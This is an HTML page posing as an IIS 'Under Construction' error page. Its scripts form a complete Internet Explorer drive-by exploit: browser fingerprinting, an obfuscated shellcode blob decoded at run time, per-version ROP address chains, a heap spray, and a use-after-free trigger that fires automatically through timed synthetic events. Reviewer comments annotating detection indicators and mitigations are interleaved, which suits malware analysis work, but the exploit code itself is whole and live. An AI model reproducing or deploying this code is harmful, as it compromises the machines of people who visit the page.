- Hax0rFunT1me !!
- <HTML>
- <head>
- <meta HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
- <title ID=titletext>Under Construction</title>
- </head>
- <SCRIPT LANGUAGE="JavaScript">
- function FINGERPRINT_IE() // Constructor: classifies the visitor by Windows version and UI language using only navigator.* strings.
- { // Analysis note: every input below is client-reported, so which branch a sample takes can be reproduced in a sandbox by setting the user agent and language.
- this.UNKNOWN = -1; // platform() result when no known "Windows NT x.y" token is found
- this.WINDOWS_XP = 1;
- this.WINDOWS_2003 = 2;
- this.WINDOWS_VISTA = 3;
- this.WINDOWS_7 = 4;
- this.EN=5; // codes 5..12 are the values tarLanguage() returns
- this.ZH=6;
- this.FR=7;
- this.DE=8;
- this.JA=9;
- this.PT=10;
- this.KO=11;
- this.RU=12;
- this.isie = function() // returns true only when appName is 'Microsoft Internet Explorer' AND userAgent contains 'MSIE'; not called anywhere in this paste
- {
- if( navigator.appName != 'Microsoft Internet Explorer' || navigator.userAgent.indexOf( 'MSIE' ) < 0 )
- return false;
- return true;
- };
- this.platform = function() // maps the "Windows NT" token in the user agent to one of the WINDOWS_* codes
- {
- if( navigator.userAgent.indexOf( 'Windows NT 5.1' ) > -1 )
- return this.WINDOWS_XP;
- else if( navigator.userAgent.indexOf( 'Windows NT 5.2' ) > -1 )
- return this.WINDOWS_2003;
- else if( navigator.userAgent.indexOf( 'Windows NT 6.0' ) > -1 )
- return this.WINDOWS_VISTA;
- else if( navigator.userAgent.indexOf( 'Windows NT 6.1' ) > -1 )
- return this.WINDOWS_7;
- return this.UNKNOWN; // any other user agent
- };
- this.tarLanguage=function() // maps the browser UI language to one of the language codes above
- {
- var language;
- if(navigator.appName=='Netscape') // non-IE browsers expose navigator.language; the else branch reads IE's navigator.browserLanguage
- language=navigator.language;
- else
- language=navigator.browserLanguage;
- if(language.indexOf('en')>-1) // substring match, first hit wins in the order en, zh, fr, de, ja, pt, ko, ru
- return this.EN;
- else if(language.indexOf('zh')>-1)
- return this.ZH;
- else if (language.indexOf('fr') > -1)
- return this.FR;
- else if (language.indexOf('de') > -1)
- return this.DE;
- else if (language.indexOf('ja') > -1)
- return this.JA;
- else if (language.indexOf('pt') > -1)
- return this.PT;
- else if(language.indexOf('ko') > -1)
- return this.KO;
- else if(language.indexOf('ru') > -1)
- return this.RU;
- else
- return alert(language); // unrecognised language: pops an alert showing the language string and returns undefined (a user-visible artifact)
- };
- }
- function dup_str(str, length) { // Returns a string of exactly `length` characters made by repeating str; not called anywhere in this paste.
- var res = str;
- while(res.length < length) { // doubles the string each pass until it is at least `length` long
- res += res;
- }
- res = res.substr(res.length - length); // keeps the trailing `length` characters
- return res;
- }
- function to_bin(str) { // Converts a hex-digit string into a binary string of UTF-16 units; not called anywhere in this paste.
- var res = "";
- while(str.length > 0) { // consumes the input four hex digits (two byte pairs) at a time
- var first = str.substr(0, 2);
- var second = str.substr(2, 2);
- res += "%u" + second + first; // the two byte pairs are swapped before being written as a %uXXXX escape
- str = (str.length > 4) ? str.substr(4) : "";
- }
- return unescape(res); // unescape() turns each %uXXXX into one 16-bit character; building "%u" text and unescaping it is a common shellcode-staging idiom worth matching on
- }
- var arr=[]; // global array filled by ManAndWoman() with copies of the payload block; being global, its contents stay referenced for the page lifetime
- function ManAndWoman() // Builds one payload block chosen by OS/language fingerprint and stores many copies of it in the global arr (heap-spray pattern).
- {
- var ie=new FINGERPRINT_IE();
- var platform = ie.platform(); // WINDOWS_* code taken from the user agent
- var tarLanguage=ie.tarLanguage(); // language code; only consulted in the WINDOWS_XP branch below
- var adjustEsp= dword2data(0x645b186a)+ // three constant dwords appended after the address list; purpose inferred from the name only (stack-pointer adjustment) - confirm by disassembly
- dword2data(0x638b1b8b)+
- dword2data(0x9090fc08);
- var vbc =("NewYoukv10EBNewYoukv4B5BNewYoukvC933NewYoukvB966NewYoukv0171NewYoukv3480NewYoukv110BNewYoukvFAE2NewYoukv05EBNewYoukvEBE8NewYoukvFFFFNewYoukvF8FFNewYoukv1013NewYoukv1111NewYoukv754E"+ // opaque encoded payload: 4-hex-digit words separated by the marker "NewYoukv"; not decoded in this review
- "NewYoukv21B0NewYoukv1111NewYoukv9A11NewYoukv1D51NewYoukv619ANewYoukvBC0DNewYoukv799ANewYoukv9A19NewYoukv7BE6NewYoukv4817NewYoukvB3F9NewYoukv1111NewYoukvF311NewYoukv51E8NewYoukv2991"+
- "NewYoukv64D2NewYoukv98EBNewYoukv0D57NewYoukv7E79NewYoukv117FNewYoukv7911NewYoukv6364NewYoukv7C7DNewYoukvCD9ANewYoukv01FANewYoukvEE42NewYoukv0D67NewYoukvEE9ANewYoukv9A44NewYoukv9AFD"+
- "NewYoukv9C07NewYoukv1443NewYoukvF3EENewYoukvFAF9NewYoukvEEEENewYoukv4BEENewYoukv444BNewYoukvF99ANewYoukv7BF9NewYoukv1111NewYoukv4C11NewYoukvFD90NewYoukv1011NewYoukv1111NewYoukvCD9A"+
- "NewYoukv7942NewYoukv1011NewYoukv1111NewYoukv47EENewYoukv9815NewYoukv314FNewYoukv15D6NewYoukv7D12NewYoukv767ENewYoukvD63FNewYoukv1255NewYoukv7615NewYoukv7778NewYoukv2211NewYoukv41D1"+
- "NewYoukv4241NewYoukvC79ANewYoukvD392NewYoukv4339NewYoukvEE41NewYoukv0947NewYoukvD122NewYoukv05FANewYoukvEE41NewYoukv3167NewYoukv67EENewYoukv9A0DNewYoukv44EENewYoukvFD9ANewYoukv479A"+
- "NewYoukv9C19NewYoukv1443NewYoukvF3EENewYoukvF6F9NewYoukvEEEENewYoukv79EENewYoukv12F9NewYoukv1111NewYoukv47EENewYoukvEE01NewYoukv3167NewYoukv47EENewYoukv901DNewYoukv15D5NewYoukv1113"+
- "NewYoukv2211NewYoukv40D8NewYoukv47EENewYoukv4005NewYoukv9A47NewYoukv2D64NewYoukv659ANewYoukv693FNewYoukvE412NewYoukv9A47NewYoukv3167NewYoukvE412NewYoukvD822NewYoukv5058NewYoukv12BC"+
- "NewYoukv22D4NewYoukv1ECANewYoukv01AFNewYoukvC72BNewYoukv1965NewYoukvDAD0NewYoukv121CNewYoukv51CBNewYoukvE0FANewYoukv0E2ANewYoukvF664NewYoukv9A4FNewYoukv354FNewYoukvCC12NewYoukv9A77"+
- "NewYoukv5A1DNewYoukv4F9ANewYoukv120DNewYoukv9ACCNewYoukv9A15NewYoukvD412NewYoukv4FBANewYoukvD248NewYoukvE8F9NewYoukvEEEFNewYoukv9FEENewYoukv1F5FNewYoukv22FDNewYoukv9BDBNewYoukv894A"+
- "NewYoukv9BEFNewYoukv341FNewYoukvEEA1NewYoukvA1D3NewYoukv3C58NewYoukv6FCANewYoukvF3C9NewYoukv2762NewYoukv3E0BNewYoukv2061NewYoukv2223NewYoukv2425NewYoukv2627NewYoukv2829NewYoukv1121NewYoukv7911NewYoukv6565NewYoukv2B61NewYoukv3E3ENewYoukv2020NewYoukv3F22NewYoukv2120NewYoukv233FNewYoukv2025NewYoukv233FNewYoukv2822NewYoukv7B3ENewYoukv6770NewYoukv6670NewYoukv743FNewYoukv7469NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111NewYoukv1111");
- var xbc=vbc.replace(/NewYoukv/g,"%u"); // the marker is swapped for "%u" only at run time, so a static scan for "%u" escapes misses this blob; detection should key on the replace-then-unescape idiom
- var gjb=unescape(xbc); // each %uXXXX becomes one 16-bit character, giving the decoded binary string
- var rop_stack="";
- if( platform == ie.WINDOWS_7 || platform == ie.WINDOWS_VISTA) // Vista/7 branch: one fixed address list regardless of language
- {
- rop_stack= dword2data(0x7c34bc93)+ // sixteen hard-coded dwords, mostly absolute addresses in 0x7c34xxxx-0x7c37xxxx; NOTE(review): the paste does not name the module - fixed addresses only resolve if that module loads without ASLR, so enforced/mandatory ASLR is the relevant mitigation
- dword2data(0x7c34bc93)+
- dword2data(0x7c343860)+
- dword2data(0x00000001)+
- dword2data(0x7c344efe)+
- dword2data(0x00001000)+
- dword2data(0x7c35f1fb)+
- dword2data(0x00000040)+
- dword2data(0x7c341137)+
- dword2data(0x7c346c0b)+
- dword2data(0x7c36277b)+
- dword2data(0x7c3415a2)+
- dword2data(0x7c373b3d)+
- dword2data(0x7c37a0a5)+
- dword2data(0x7c378c81)+
- dword2data(0x7c345c30);
- while(rop_stack.length < (0x6c/2)) // .length counts 16-bit units, hence 0x6c bytes is written as 0x6c/2
- {
- rop_stack+=dword2data(0x90909090); // pads with 0x90 bytes up to that size
- }
- rop_stack+=dword2data(0x04eb9090);
- rop_stack+=dword2data(0x7c348b05);
- }
- else if( platform == ie.WINDOWS_XP ) // XP branch: addresses are computed as module base + offset, with the base picked per UI language
- {
- var dllBase;//iertutil.dll
- var insOff=0xFD5A8; // offsets added to dllBase below
- var insOff2=0xBA108;
- var kernelBase=0x7c800000;//kernel32.dll
- var kerOff1=0x7BF37; // kerOff1..7 are offsets added to kernelBase below
- var kerOff2=0x9AF1;
- var kerOff3=0xE034;
- var kerOff4=0x7F436;
- var kerOff5=0x36A08;
- var kerOff6=0x6CFC3;
- var kerOff7=0x1BC81;
- if(tarLanguage == ie.EN) // one hard-coded dllBase per language code; these constants imply a different load address per localized build (not verifiable from the paste)
- {
- dllBase=0x3dfd0000;
- }
- else if(tarLanguage == ie.ZH)
- {
- dllBase=0x3eab0000;
- }
- else if(tarLanguage == ie.JA)
- {
- dllBase=0x40930000;
- }
- else if(tarLanguage == ie.KO) // only language that also overrides kernelBase
- {
- dllBase=0x3f8d0000;
- kernelBase=0x7c7d0000;
- }
- else if(tarLanguage == ie.DE)
- {
- dllBase=0x40f50000;
- }
- else if(tarLanguage == ie.FR)
- {
- dllBase=0x40b40000;
- }
- else if(tarLanguage == ie.RU)
- {
- dllBase=0x40080000;
- }
- else if(tarLanguage == ie.PT)
- {
- dllBase=0x400f0000;
- }
- rop_stack= dword2data(kernelBase+kerOff1)+ // thirteen dwords: computed addresses interleaved with small constants
- dword2data(kernelBase+kerOff2)+
- dword2data(kernelBase+kerOff3)+
- dword2data(0x00000040)+
- dword2data(0x00000001)+
- dword2data(kernelBase+kerOff4)+
- dword2data(0x41414141)+
- dword2data(0x00001000)+
- dword2data(0x90909090)+
- dword2data(kernelBase+kerOff5)+
- dword2data(kernelBase+kerOff6)+
- dword2data(kernelBase+kerOff7)+
- dword2data(dllBase+insOff);
- while(rop_stack.length < (0x6c/2)) // same padding rule as the Vista/7 branch
- {
- rop_stack+=dword2data(0x90909090);
- }
- rop_stack+=dword2data(0x04eb9090);
- rop_stack+=dword2data(dllBase+insOff2);
- } // no address list is built for WINDOWS_2003 or UNKNOWN; rop_stack is still "" at this point for those
- rop_stack+=adjustEsp;
- rop_stack+=gjb; // decoded payload goes last
- var memory_layout= dword2data(0xDEADBEE1)+ // nine marker dwords 0xDEADBEE1..0xDEADBEE9 placed at the start of every block; a recognisable constant run for memory forensics
- dword2data(0xDEADBEE2)+
- dword2data(0xDEADBEE3)+
- dword2data(0xDEADBEE4)+
- dword2data(0xDEADBEE5)+
- dword2data(0xDEADBEE6)+
- dword2data(0xDEADBEE7)+
- dword2data(0xDEADBEE8)+
- dword2data(0xDEADBEE9);
- var code=rop_stack;
- var nops=unescape('%u9'+'090'+'%u9'+'090'); // the literal "%u9090" is split across concatenated strings, which defeats a plain-text search for it; evaluates to two 0x9090 units
- while(nops.length < 0x80000) // doubled until at least 0x80000 units long
- {
- nops+=nops;
- }
- var offset=nops.substring(0,0x5f4-memory_layout.length); // filler so that code starts at unit offset 0x5f4 inside the pattern
- var blockItem=memory_layout+offset+code+nops.substring(0,0x800-0x5f4-code.length); // one pattern, intended to be 0x800 units: markers, filler, code, filler
- while(blockItem.length < 0x40000) // pattern repeated by doubling
- {
- blockItem+=blockItem;
- }
- var block_shell=blockItem.substring(0,(0x80000-6)/2); // trimmed to (0x80000-6)/2 units, i.e. just under 0x80000 bytes per string
- for(var i=1;i<0x1c2;++i) // fills arr[1]..arr[0x1c1]; hundreds of near-identical large strings allocated in a burst is the observable heap-spray indicator
- {
- arr[i]=block_shell.substring(0,block_shell.length); // presumably substring() is used to get a separate copy per slot rather than a shared reference - TODO confirm for the targeted engine
- }
- }
- </SCRIPT>
- <BODY> <!-- Trigger markup: an img and a div share the id "imgTest"; the div is a 3000x4000 white area inside anchor MyA, so its mouseover/mouseout handlers call OnTest2() and a click on the anchor calls OnTest(). -->
- <DIV id=testfaild>
- <img id="imgTest" style="display:none">
- <a href="javascript:OnTest();" id="MyA" onClick="OnTest();">
- <div style="background-color:#FFFFFF; width:3000; height:4000" id="imgTest" src="" onMouseOver="OnTest2();" onMouseOut="OnTest2();"> </div>
- </a>
- </DIV>
- <SCRIPT LANGUAGE="JavaScript">
- function dword2data( dword ) // Encodes a 32-bit value as a two-character string: low 16 bits first, then high 16 bits.
- {
- var d = Number( dword ).toString( 16 ); // hex text without leading zeros
- while( d.length < 8 ) // left-pad to eight hex digits
- d = '0' + d;
- return unescape( '%u' + d.substr( 4, 8 ) + '%u' + d.substr( 0, 4 ) ); // substr(4, 8) yields the last four digits (only four remain), so the low word is emitted before the high word
- }
- function OnTest() // Click handler of the MyA anchor: re-parses the testfaild container, then assigns a crafted string to several element classNames.
- {
- var tag=0x0c0c0c0c; // constant repeated-byte address value, a pattern commonly associated with heap-spray targets
- var vtable1 = dword2data( tag ) + '1234567555555555588888888'; // tag as two 16-bit units followed by fixed ASCII filler; the name suggests a fake vtable pointer (inferred from the name only)
- var divs = new Array();
- for( var i=0 ; i<128; i++ ) // 128 detached div elements created before the re-parse
- divs.push( document.createElement( 'div' ) );
- Math.atan2(0xbabe,"trigger before!!!"); // result discarded; looks like a debugging marker left by the author - TODO confirm
- testfaild.innerHTML = testfaild.innerHTML; // self-assignment makes the browser re-parse the markup and replace the existing img/a/div children with new nodes
- Math.atan2(0xbabe,"trigger before 222!!!"); // second marker call, result discarded
- divs[0].className = vtable1; // NOTE(review): assigning the crafted string right after the re-parse is consistent with reclaiming just-freed object memory (use-after-free) - inferred from ordering, confirm under a debugger
- divs[1].className = vtable1;
- divs[2].className = vtable1;
- divs[3].className = vtable1;
- }
- function OnTest2() // mouseover/mouseout handler of the large div: clears the src of whatever the name imgTest resolves to.
- {
- eval("imgTest").src=""; // eval of a constant string resolves the name imgTest at run time; two elements in the markup carry that id
- }
- function triggerFunc() // Fires synthetic mouse events on the page so the handlers run without user interaction, then re-arms itself every second.
- {
- var x=document.getElementsByTagName("div"); // live list of all div elements in the document
- var fireOnThis=document.getElementById("MyA");
- if(document.createEvent) // DOM-events path
- {
- evObj=document.createEvent('MouseEvents'); // evObj has no var declaration, so it is created as a global
- evObj.iniEvent('click',true,false);
- fireOnThis.dispatchEvent(evObj);
- }
- else if(document.createEventObject) // legacy IE event model path
- {
- x[1].fireEvent('onMouseOver'); // order: mouseover on the second div, click on the anchor, mouseout on the second div
- fireOnThis.fireEvent('onclick');
- x[1].fireEvent('onMouseOut');
- }
- setTimeout("triggerFunc();",1000); // string form of setTimeout is evaluated as code; repeats the whole sequence after 1000 ms
- }
- setTimeout("triggerFunc();",1000); // schedules the first synthetic-event round 1000 ms after the script runs (string argument is evaluated as code)
- ManAndWoman(); // runs synchronously during page parse, so arr is already filled before the first timer fires
- </SCRIPT>
- <body bgcolor=white>
- <table>
- <tr>
- <td ID=tableProps width=70 valign=top align=center>
- <img ID=pagerrorImg src="pagerror.gif" width=36 height=48>
- <td ID=tablePropsWidth width=400>
- <h1 ID=errortype style="font:14pt/16pt verdana; color:#4e4e4e">
- <P ID=Comment1><!--Problem--><P ID="errorText">Under Construction</h1>
- <P ID=Comment2><!--Probable causes:<--><P ID="errordesc"><font style="font:9pt/12pt verdana; color:black">
- The site you are trying to view does not currently have a default page. It may be in the process of being upgraded and configured.
- <P ID=term1>Please try this site again later. If you still experience the problem, try contacting the Web site administrator.
- <hr size=1 color="blue">
- <P ID=message1>If you are the Web site administrator and feel you have received this message in error, please see "Enabling and Disabling Dynamic Content" in IIS Help.
- <h5 ID=head1>To access IIS Help</h5>
- <ol>
- <li ID=bullet1>Click <b>Start</b>, and then click <b>Run</b>.
- <li ID=bullet2>In the <b>Open</b> text box, type <b>inetmgr</b>. IIS Manager appears.
- <li ID=bullet3>From the <b>Help</b> menu, click <b>Help Topics</b>.
- <li ID=bullet4>Click <b>Internet Information Services</b>.</ol>
- </td>
- </tr>
- </table>
- </BODY>
- </HTML>